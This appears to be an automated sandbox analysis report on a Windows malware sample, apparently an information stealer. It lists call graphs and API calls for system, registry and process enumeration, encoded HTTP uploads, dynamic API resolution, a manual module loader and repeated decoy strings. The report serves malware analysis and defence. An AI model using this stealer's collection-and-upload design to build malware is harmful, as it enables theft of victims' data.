lstrcpy 14932->14933 14934 e52073 14933->14934 14935 e5207e GetCurrentProcessId 14934->14935 15546 e59470 OpenProcess 14935->15546 14938 e5a920 3 API calls 14939 e520a4 14938->14939 14940 e5a8a0 lstrcpy 14939->14940 14941 e520ad 14940->14941 14942 e5a9b0 4 API calls 14941->14942 14943 e520d7 14942->14943 14944 e5a8a0 lstrcpy 14943->14944 14945 e520e0 14944->14945 14946 e5a9b0 4 API calls 14945->14946 14947 e52100 14946->14947 14948 e5a8a0 lstrcpy 14947->14948 14949 e52109 14948->14949 15551 e57e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14949->15551 14952 e5a9b0 4 API calls 14953 e52129 14952->14953 14954 e5a8a0 lstrcpy 14953->14954 14955 e52132 14954->14955 14956 e5a9b0 4 API calls 14955->14956 14957 e52151 14956->14957 14958 e5a8a0 lstrcpy 14957->14958 14959 e5215a 14958->14959 14960 e5a9b0 4 API calls 14959->14960 14961 e5217b 14960->14961 14962 e5a8a0 lstrcpy 14961->14962 14963 e52184 14962->14963 15555 e57f60 14963->15555 14966 e5a9b0 4 API calls 14967 e521a4 14966->14967 14968 e5a8a0 lstrcpy 14967->14968 14969 e521ad 14968->14969 14970 e5a9b0 4 API calls 14969->14970 14971 e521cc 14970->14971 14972 e5a8a0 lstrcpy 14971->14972 14973 e521d5 14972->14973 14974 e5a9b0 4 API calls 14973->14974 14975 e521f6 14974->14975 14976 e5a8a0 lstrcpy 14975->14976 14977 e521ff 14976->14977 15568 e57ed0 GetSystemInfo wsprintfA 14977->15568 14980 e5a9b0 4 API calls 14981 e5221f 14980->14981 14982 e5a8a0 lstrcpy 14981->14982 14983 e52228 14982->14983 14984 e5a9b0 4 API calls 14983->14984 14985 e52247 14984->14985 14986 e5a8a0 lstrcpy 14985->14986 14987 e52250 14986->14987 14988 e5a9b0 4 API calls 14987->14988 14989 e52270 14988->14989 14990 e5a8a0 lstrcpy 14989->14990 14991 e52279 14990->14991 15570 e58100 GetProcessHeap RtlAllocateHeap 14991->15570 14994 e5a9b0 4 API calls 14995 e52299 14994->14995 14996 e5a8a0 lstrcpy 14995->14996 14997 e522a2 14996->14997 14998 e5a9b0 4 API calls 14997->14998 14999 e522c1 14998->14999 15000 e5a8a0 lstrcpy 14999->15000 15001 e522ca 15000->15001 15002 e5a9b0 4 API calls 15001->15002 15003 e522eb 15002->15003 15004 e5a8a0 lstrcpy 15003->15004 15005 e522f4 15004->15005 15576 e587c0 15005->15576 15008 e5a920 3 API calls 15009 e5231e 15008->15009 15010 e5a8a0 lstrcpy 15009->15010 15011 e52327 15010->15011 15012 e5a9b0 4 API calls 15011->15012 15013 e52351 15012->15013 15014 e5a8a0 lstrcpy 15013->15014 15015 e5235a 15014->15015 15016 e5a9b0 4 API calls 15015->15016 15017 e5237a 15016->15017 15018 e5a8a0 lstrcpy 15017->15018 15019 e52383 15018->15019 15020 e5a9b0 4 API calls 15019->15020 15021 e523a2 15020->15021 15022 e5a8a0 lstrcpy 15021->15022 15023 e523ab 15022->15023 15581 e581f0 15023->15581 15025 e523c2 15026 e5a920 3 API calls 15025->15026 15027 e523d5 15026->15027 15028 e5a8a0 lstrcpy 15027->15028 15029 e523de 15028->15029 15030 e5a9b0 4 API calls 15029->15030 15031 e5240a 15030->15031 15032 e5a8a0 lstrcpy 15031->15032 15033 e52413 15032->15033 15034 e5a9b0 4 API calls 15033->15034 15035 e52432 15034->15035 15036 e5a8a0 lstrcpy 15035->15036 15037 e5243b 15036->15037 15038 e5a9b0 4 API calls 15037->15038 15039 e5245c 15038->15039 15040 e5a8a0 lstrcpy 15039->15040 15041 e52465 15040->15041 15042 e5a9b0 4 API calls 15041->15042 15043 e52484 15042->15043 15044 e5a8a0 lstrcpy 15043->15044 15045 e5248d 15044->15045 15046 e5a9b0 4 API calls 15045->15046 15047 e524ae 15046->15047 15048 e5a8a0 lstrcpy 15047->15048 15049 e524b7 15048->15049 15589 e58320 15049->15589 15051 e524d3 15052 e5a920 3 API calls 15051->15052 15053 e524e6 15052->15053 15054 e5a8a0 lstrcpy 15053->15054 15055 e524ef 15054->15055 15056 e5a9b0 4 API calls 15055->15056 15057 e52519 15056->15057 15058 e5a8a0 lstrcpy 15057->15058 15059 e52522 15058->15059 15060 e5a9b0 4 API calls 15059->15060 15061 e52543 15060->15061 15062 e5a8a0 lstrcpy 15061->15062 15063 e5254c 15062->15063 15064 e58320 17 API calls 15063->15064 15065 e52568 15064->15065 15066 e5a920 3 API calls 15065->15066 15067 e5257b 15066->15067 15068 e5a8a0 lstrcpy 15067->15068 15069 e52584 15068->15069 15070 e5a9b0 4 API calls 15069->15070 15071 e525ae 15070->15071 15072 e5a8a0 lstrcpy 15071->15072 15073 e525b7 15072->15073 15074 e5a9b0 4 API calls 15073->15074 15075 e525d6 15074->15075 15076 e5a8a0 lstrcpy 15075->15076 15077 e525df 15076->15077 15078 e5a9b0 4 API calls 15077->15078 15079 e52600 15078->15079 15080 e5a8a0 lstrcpy 15079->15080 15081 e52609 15080->15081 15625 e58680 15081->15625 15083 e52620 15084 e5a920 3 API calls 15083->15084 15085 e52633 15084->15085 15086 e5a8a0 lstrcpy 15085->15086 15087 e5263c 15086->15087 15088 e5265a lstrlen 15087->15088 15089 e5266a 15088->15089 15090 e5a740 lstrcpy 15089->15090 15091 e5267c 15090->15091 15092 e41590 lstrcpy 15091->15092 15093 e5268d 15092->15093 15635 e55190 15093->15635 15095 e52699 15095->13527 15823 e5aad0 15096->15823 15098 e45009 InternetOpenUrlA 15102 e45021 15098->15102 15099 e450a0 InternetCloseHandle InternetCloseHandle 15101 e450ec 15099->15101 15100 e4502a InternetReadFile 15100->15102 15101->13531 15102->15099 15102->15100 15824 e498d0 15103->15824 15105 e50759 15106 e5077d 15105->15106 15107 e50a38 15105->15107 15109 e50799 StrCmpCA 15106->15109 15108 e41590 lstrcpy 15107->15108 15110 e50a49 15108->15110 15112 e50843 15109->15112 15113 e507a8 15109->15113 16000 e50250 15110->16000 15116 e50865 StrCmpCA 15112->15116 15115 e5a7a0 lstrcpy 15113->15115 15117 e507c3 15115->15117 15118 e50874 15116->15118 15155 e5096b 15116->15155 15119 e41590 lstrcpy 15117->15119 15120 e5a740 lstrcpy 15118->15120 15121 e5080c 15119->15121 15123 e50881 15120->15123 15124 e5a7a0 lstrcpy 15121->15124 15122 e5099c StrCmpCA 15125 e50a2d 15122->15125 15126 e509ab 15122->15126 15127 e5a9b0 4 API calls 15123->15127 15128 e50823 15124->15128 15125->13535 15129 e41590 lstrcpy 15126->15129 15130 e508ac 15127->15130 15131 e5a7a0 lstrcpy 15128->15131 15132 e509f4 15129->15132 15133 e5a920 3 API calls 15130->15133 15134 e5083e 15131->15134 15135 e5a7a0 lstrcpy 15132->15135 15136 e508b3 15133->15136 15827 e4fb00 15134->15827 15138 e50a0d 15135->15138 15139 e5a9b0 4 API calls 15136->15139 15140 e5a7a0 lstrcpy 15138->15140 15141 e508ba 15139->15141 15142 e50a28 15140->15142 15155->15122 15475 e5a7a0 lstrcpy 15474->15475 15476 e41683 15475->15476 15477 e5a7a0 lstrcpy 15476->15477 15478 e41695 15477->15478 15479 e5a7a0 lstrcpy 15478->15479 15480 e416a7 15479->15480 15481 e5a7a0 lstrcpy 15480->15481 15482 e415a3 15481->15482 15482->14358 15484 e447c6 15483->15484 15485 e44838 lstrlen 15484->15485 15509 e5aad0 15485->15509 15487 e44848 InternetCrackUrlA 15488 e44867 15487->15488 15488->14435 15490 e5a740 lstrcpy 15489->15490 15491 e58b74 15490->15491 15492 e5a740 lstrcpy 15491->15492 15493 e58b82 GetSystemTime 15492->15493 15494 e58b99 15493->15494 15495 e5a7a0 lstrcpy 15494->15495 15496 e58bfc 15495->15496 15496->14450 15498 e5a931 15497->15498 15499 e5a988 15498->15499 15501 e5a968 lstrcpy lstrcat 15498->15501 15500 e5a7a0 lstrcpy 15499->15500 15502 e5a994 15500->15502 15501->15499 15502->14453 15503->14568 15505 e49af9 LocalAlloc 15504->15505 15506 e44eee 15504->15506 15505->15506 15507 e49b14 CryptStringToBinaryA 15505->15507 15506->14456 15506->14459 15507->15506 15508 e49b39 LocalFree 15507->15508 15508->15506 15509->15487 15510->14578 15511->14719 15512->14721 15513->14729 15642 e577a0 15514->15642 15517 e576c6 RegOpenKeyExA 15518 e57704 RegCloseKey 15517->15518 15519 e576e7 RegQueryValueExA 15517->15519 15520 e51c1e 15518->15520 15519->15518 15520->14811 15522 e51c99 15521->15522 15522->14825 15524 e51e09 15523->15524 15524->14867 15526 e57a9a wsprintfA 15525->15526 15527 e51e84 15525->15527 15526->15527 15527->14881 15529 e57b4d 15528->15529 15531 e51efe 15528->15531 15649 e58d20 LocalAlloc CharToOemW 15529->15649 15531->14895 15533 e5a740 lstrcpy 15532->15533 15534 e57bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15533->15534 15537 e57c25 15534->15537 15535 e57c46 GetLocaleInfoA 15535->15537 15536 e57d18 15538 e57d1e LocalFree 15536->15538 15539 e57d28 15536->15539 15537->15535 15537->15536 15540 e5a9b0 lstrcpy lstrlen lstrcpy lstrcat 15537->15540 15543 e5a8a0 lstrcpy 15537->15543 15538->15539 15541 e5a7a0 lstrcpy 15539->15541 15540->15537 15542 e57d37 15541->15542 15542->14908 15543->15537 15545 e52008 15544->15545 15545->14923 15547 e594b5 15546->15547 15548 e59493 GetModuleFileNameExA CloseHandle 15546->15548 15549 e5a740 lstrcpy 15547->15549 15548->15547 15550 e52091 15549->15550 15550->14938 15552 e57e68 RegQueryValueExA 15551->15552 15554 e52119 15551->15554 15553 e57e8e RegCloseKey 15552->15553 15553->15554 15554->14952 15556 e57fb9 GetLogicalProcessorInformationEx 15555->15556 15557 e57fd8 GetLastError 15556->15557 15561 e58029 15556->15561 15563 e57fe3 15557->15563 15567 e58022 15557->15567 15560 e52194 15560->14966 15562 e589f0 2 API calls 15561->15562 15565 e5807b 15562->15565 15563->15556 15563->15560 15650 e589f0 15563->15650 15653 e58a10 GetProcessHeap RtlAllocateHeap 15563->15653 15564 e589f0 2 API calls 15564->15560 15566 e58084 wsprintfA 15565->15566 15565->15567 15566->15560 15567->15560 15567->15564 15569 e5220f 15568->15569 15569->14980 15571 e589b0 15570->15571 15572 e5814d GlobalMemoryStatusEx 15571->15572 15573 e58163 __aulldiv 15572->15573 15574 e5819b wsprintfA 15573->15574 15575 e52289 15574->15575 15575->14994 15577 e587fb GetProcessHeap RtlAllocateHeap wsprintfA 15576->15577 15579 e5a740 lstrcpy 15577->15579 15580 e5230b 15579->15580 15580->15008 15582 e5a740 lstrcpy 15581->15582 15588 e58229 15582->15588 15583 e58263 15584 e5a7a0 lstrcpy 15583->15584 15586 e582dc 15584->15586 15585 e5a9b0 lstrcpy lstrlen lstrcpy lstrcat 15585->15588 15586->15025 15587 e5a8a0 lstrcpy 15587->15588 15588->15583 15588->15585 15588->15587 15590 e5a740 lstrcpy 15589->15590 15591 e5835c RegOpenKeyExA 15590->15591 15592 e583d0 15591->15592 15593 e583ae 15591->15593 15595 e58613 RegCloseKey 15592->15595 15596 e583f8 RegEnumKeyExA 15592->15596 15594 e5a7a0 lstrcpy 15593->15594 15599 e583bd 15594->15599 15600 e5a7a0 lstrcpy 15595->15600 15597 e5843f wsprintfA RegOpenKeyExA 15596->15597 15598 e5860e 15596->15598 15601 e58485 RegCloseKey RegCloseKey 15597->15601 15602 e584c1 RegQueryValueExA 15597->15602 15598->15595 15599->15051 15600->15599 15605 e5a7a0 lstrcpy 15601->15605 15603 e58601 RegCloseKey 15602->15603 15604 e584fa lstrlen 15602->15604 15603->15598 15604->15603 15606 e58510 15604->15606 15605->15599 15607 e5a9b0 4 API calls 15606->15607 15608 e58527 15607->15608 15609 e5a8a0 lstrcpy 15608->15609 15610 e58533 15609->15610 15611 e5a9b0 4 API calls 15610->15611 15612 e58557 15611->15612 15613 e5a8a0 lstrcpy 15612->15613 15614 e58563 15613->15614 15615 e5856e RegQueryValueExA 15614->15615 15615->15603 15616 e585a3 15615->15616 15617 e5a9b0 4 API calls 15616->15617 15618 e585ba 15617->15618 15619 e5a8a0 lstrcpy 15618->15619 15620 e585c6 15619->15620 15621 e5a9b0 4 API calls 15620->15621 15622 e585ea 15621->15622 15623 e5a8a0 lstrcpy 15622->15623 15624 e585f6 15623->15624 15624->15603 15626 e5a740 lstrcpy 15625->15626 15627 e586bc CreateToolhelp32Snapshot Process32First 15626->15627 15628 e5875d CloseHandle 15627->15628 15629 e586e8 Process32Next 15627->15629 15630 e5a7a0 lstrcpy 15628->15630 15629->15628 15634 e586fd 15629->15634 15632 e58776 15630->15632 15631 e5a9b0 lstrcpy lstrlen lstrcpy lstrcat 15631->15634 15632->15083 15633 e5a8a0 lstrcpy 15633->15634 15634->15629 15634->15631 15634->15633 15636 e5a7a0 lstrcpy 15635->15636 15637 e551b5 15636->15637 15638 e41590 lstrcpy 15637->15638 15639 e551c6 15638->15639 15654 e45100 15639->15654 15641 e551cf 15641->15095 15645 e57720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15642->15645 15644 e576b9 15644->15517 15644->15520 15646 e57765 RegQueryValueExA 15645->15646 15647 e57780 RegCloseKey 15645->15647 15646->15647 15648 e57793 15647->15648 15648->15644 15649->15531 15651 e58a0c 15650->15651 15652 e589f9 GetProcessHeap HeapFree 15650->15652 15651->15563 15652->15651 15653->15563 15655 e5a7a0 lstrcpy 15654->15655 15656 e45119 15655->15656 15657 e447b0 2 API calls 15656->15657 15658 e45125 15657->15658 15814 e58ea0 15658->15814 15660 e45184 15661 e45192 lstrlen 15660->15661 15662 e451a5 15661->15662 15663 e58ea0 4 API calls 15662->15663 15664 e451b6 15663->15664 15665 e5a740 lstrcpy 15664->15665 15666 e451c9 15665->15666 15667 e5a740 lstrcpy 15666->15667 15668 e451d6 15667->15668 15669 e5a740 lstrcpy 15668->15669 15670 e451e3 15669->15670 15671 e5a740 lstrcpy 15670->15671 15672 e451f0 15671->15672 15673 e5a740 lstrcpy 15672->15673 15674 e451fd InternetOpenA StrCmpCA 15673->15674 15675 e4522f 15674->15675 15676 e458c4 InternetCloseHandle 15675->15676 15677 e58b60 3 API calls 15675->15677 15683 e458d9 codecvt 15676->15683 15678 e4524e 15677->15678 15679 e5a920 3 API calls 15678->15679 15680 e45261 15679->15680 15681 e5a8a0 lstrcpy 15680->15681 15682 e4526a 15681->15682 15684 e5a9b0 4 API calls 15682->15684 15687 e5a7a0 lstrcpy 15683->15687 15685 e452ab 15684->15685 15686 e5a920 3 API calls 15685->15686 15688 e452b2 15686->15688 15692 e45913 15687->15692 15689 e5a9b0 4 API calls 15688->15689 15690 e452b9 15689->15690 15691 e5a8a0 lstrcpy 15690->15691 15693 e452c2 15691->15693 15692->15641 15694 e5a9b0 4 API calls 15693->15694 15695 e45303 15694->15695 15696 e5a920 3 API calls 15695->15696 15697 e4530a 15696->15697 15698 e5a8a0 lstrcpy 15697->15698 15699 e45313 15698->15699 15700 e45329 InternetConnectA 15699->15700 15700->15676 15701 e45359 HttpOpenRequestA 15700->15701 15703 e458b7 InternetCloseHandle 15701->15703 15704 e453b7 15701->15704 15703->15676 15705 e5a9b0 4 API calls 15704->15705 15706 e453cb 15705->15706 15707 e5a8a0 lstrcpy 15706->15707 15708 e453d4 15707->15708 15709 e5a920 3 API calls 15708->15709 15710 e453f2 15709->15710 15711 e5a8a0 lstrcpy 15710->15711 15712 e453fb 15711->15712 15713 e5a9b0 4 API calls 15712->15713 15714 e4541a 15713->15714 15715 e5a8a0 lstrcpy 15714->15715 15716 e45423 15715->15716 15717 e5a9b0 4 API calls 15716->15717 15718 e45444 15717->15718 15719 e5a8a0 lstrcpy 15718->15719 15720 e4544d 15719->15720 15721 e5a9b0 4 API calls 15720->15721 15722 e4546e 15721->15722 15815 e58ead CryptBinaryToStringA 15814->15815 15816 e58ea9 15814->15816 15815->15816 15817 e58ece GetProcessHeap RtlAllocateHeap 15815->15817 15816->15660 15817->15816 15818 e58ef4 codecvt 15817->15818 15819 e58f05 CryptBinaryToStringA 15818->15819 15819->15816 15823->15098 16066 e49880 15824->16066 15826 e498e1 15826->15105 15828 e5a740 lstrcpy 15827->15828 16001 e5a740 lstrcpy 16000->16001 16002 e50266 16001->16002 16003 e58de0 2 API calls 16002->16003 16004 e5027b 16003->16004 16005 e5a920 3 API calls 16004->16005 16006 e5028b 16005->16006 16007 e5a8a0 lstrcpy 16006->16007 16008 e50294 16007->16008 16009 e5a9b0 4 API calls 16008->16009 16067 e4988d 16066->16067 16070 e46fb0 16067->16070 16069 e498ad codecvt 16069->15826 16073 e46d40 16070->16073 16074 e46d63 16073->16074 16087 e46d59 16073->16087 16089 e46530 16074->16089 16078 e46dbe 16078->16087 16099 e469b0 16078->16099 16080 e46e2a 16081 e46ee6 VirtualFree 16080->16081 16083 e46ef7 16080->16083 16080->16087 16081->16083 16082 e46f41 16084 e589f0 2 API calls 16082->16084 16082->16087 16083->16082 16085 e46f26 FreeLibrary 16083->16085 16086 e46f38 16083->16086 16084->16087 16085->16083 16088 e589f0 2 API calls 16086->16088 16087->16069 16088->16082 16090 e46542 16089->16090 16092 e46549 16090->16092 16109 e58a10 GetProcessHeap RtlAllocateHeap 16090->16109 16092->16087 16093 e46660 16092->16093 16096 e4668f VirtualAlloc 16093->16096 16095 e46730 16097 e46743 VirtualAlloc 16095->16097 16098 e4673c 16095->16098 16096->16095 16096->16098 16097->16098 16098->16078 16100 e469c9 16099->16100 16104 e469d5 16099->16104 16101 e46a09 LoadLibraryA 16100->16101 16100->16104 16102 e46a32 16101->16102 16101->16104 16106 e46ae0 16102->16106 16110 e58a10 GetProcessHeap RtlAllocateHeap 16102->16110 16104->16080 16105 e46ba8 GetProcAddress 16105->16104 16105->16106 16106->16104 16106->16105 16107 e589f0 2 API calls 16107->16106 16108 e46a8b 16108->16104 16108->16107 16109->16092 16110->16108 17685 1248b89 17686 1248be9 CloseHandle 17685->17686 17687 1248bf4 17686->17687

                                  Executed Functions

                                  Function 00E59860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 660 e59860-e59874 call e59750 663 e59a93-e59af2 LoadLibraryA * 5 660->663 664 e5987a-e59a8e call e59780 GetProcAddress * 21 660->664 665 e59af4-e59b08 GetProcAddress 663->665 666 e59b0d-e59b14 663->666 664->663 665->666 669 e59b46-e59b4d 666->669 670 e59b16-e59b41 GetProcAddress * 2 666->670 671 e59b4f-e59b63 GetProcAddress 669->671 672 e59b68-e59b6f 669->672 670->669 671->672 673 e59b71-e59b84 GetProcAddress 672->673 674 e59b89-e59b90 672->674 673->674 675 e59bc1-e59bc2 674->675 676 e59b92-e59bbc GetProcAddress * 2 674->676 676->675
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,01CB14F8), ref: 00E598A1
                                  • GetProcAddress.KERNEL32(75900000,01CB1648), ref: 00E598BA
                                  • GetProcAddress.KERNEL32(75900000,01CB15B8), ref: 00E598D2
                                  • GetProcAddress.KERNEL32(75900000,01CB1528), ref: 00E598EA
                                  • GetProcAddress.KERNEL32(75900000,01CB1690), ref: 00E59903
                                  • GetProcAddress.KERNEL32(75900000,01CB9AD0), ref: 00E5991B
                                  • GetProcAddress.KERNEL32(75900000,01CA66E0), ref: 00E59933
                                  • GetProcAddress.KERNEL32(75900000,01CA6860), ref: 00E5994C
                                  • GetProcAddress.KERNEL32(75900000,01CB1678), ref: 00E59964
                                  • GetProcAddress.KERNEL32(75900000,01CB16A8), ref: 00E5997C
                                  • GetProcAddress.KERNEL32(75900000,01CB1738), ref: 00E59995
                                  • GetProcAddress.KERNEL32(75900000,01CB16C0), ref: 00E599AD
                                  • GetProcAddress.KERNEL32(75900000,01CA6880), ref: 00E599C5
                                  • GetProcAddress.KERNEL32(75900000,01CB16D8), ref: 00E599DE
                                  • GetProcAddress.KERNEL32(75900000,01CB1588), ref: 00E599F6
                                  • GetProcAddress.KERNEL32(75900000,01CA6700), ref: 00E59A0E
                                  • GetProcAddress.KERNEL32(75900000,01CB1798), ref: 00E59A27
                                  • GetProcAddress.KERNEL32(75900000,01CB1858), ref: 00E59A3F
                                  • GetProcAddress.KERNEL32(75900000,01CA66C0), ref: 00E59A57
                                  • GetProcAddress.KERNEL32(75900000,01CB1870), ref: 00E59A70
                                  • GetProcAddress.KERNEL32(75900000,01CA69A0), ref: 00E59A88
                                  • LoadLibraryA.KERNEL32(01CB17E0,?,00E56A00), ref: 00E59A9A
                                  • LoadLibraryA.KERNEL32(01CB17C8,?,00E56A00), ref: 00E59AAB
                                  • LoadLibraryA.KERNEL32(01CB17F8,?,00E56A00), ref: 00E59ABD
                                  • LoadLibraryA.KERNEL32(01CB1810,?,00E56A00), ref: 00E59ACF
                                  • LoadLibraryA.KERNEL32(01CB1888,?,00E56A00), ref: 00E59AE0
                                  • GetProcAddress.KERNEL32(75070000,01CB1828), ref: 00E59B02
                                  • GetProcAddress.KERNEL32(75FD0000,01CB1840), ref: 00E59B23
                                  • GetProcAddress.KERNEL32(75FD0000,01CB9D48), ref: 00E59B3B
                                  • GetProcAddress.KERNEL32(75A50000,01CB9CE8), ref: 00E59B5D
                                  • GetProcAddress.KERNEL32(74E50000,01CA6960), ref: 00E59B7E
                                  • GetProcAddress.KERNEL32(76E80000,01CB9A90), ref: 00E59B9F
                                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00E59BB6
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 00E59BAA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: 7f4a083cc688c389ba15c94fdba1c41704982b388515214bf4b6d5402e637e90
                                  • Instruction ID: 284539fc4dcd1ff910f64f1238b50349aeaa06bbbf7eb8721a5bcb288bce498d
                                  • Opcode Fuzzy Hash: 7f4a083cc688c389ba15c94fdba1c41704982b388515214bf4b6d5402e637e90
                                  • Instruction Fuzzy Hash: 71A14BB5718200DFD364EFA8E988A5E37F9F78C711704451BA6C693A4CD63FA452EB20
                                  Function 00E445C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 764 e445c0-e44695 RtlAllocateHeap 781 e446a0-e446a6 764->781 782 e446ac-e4474a 781->782 783 e4474f-e447a9 VirtualProtect 781->783 782->781
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E4460F
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00E4479C
                                  Strings
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E445E8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44622
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44678
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44734
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44729
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E445D2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E4475A
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E4473F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E4462D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E4466D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44765
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E4477B
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44657
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E445C7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E446D8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44643
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E4471E
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E445F3
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E446CD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E446B7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E446AC
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44662
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44683
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44638
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E4474F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44617
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44713
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E445DD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E446C2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44770
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmpDownload File
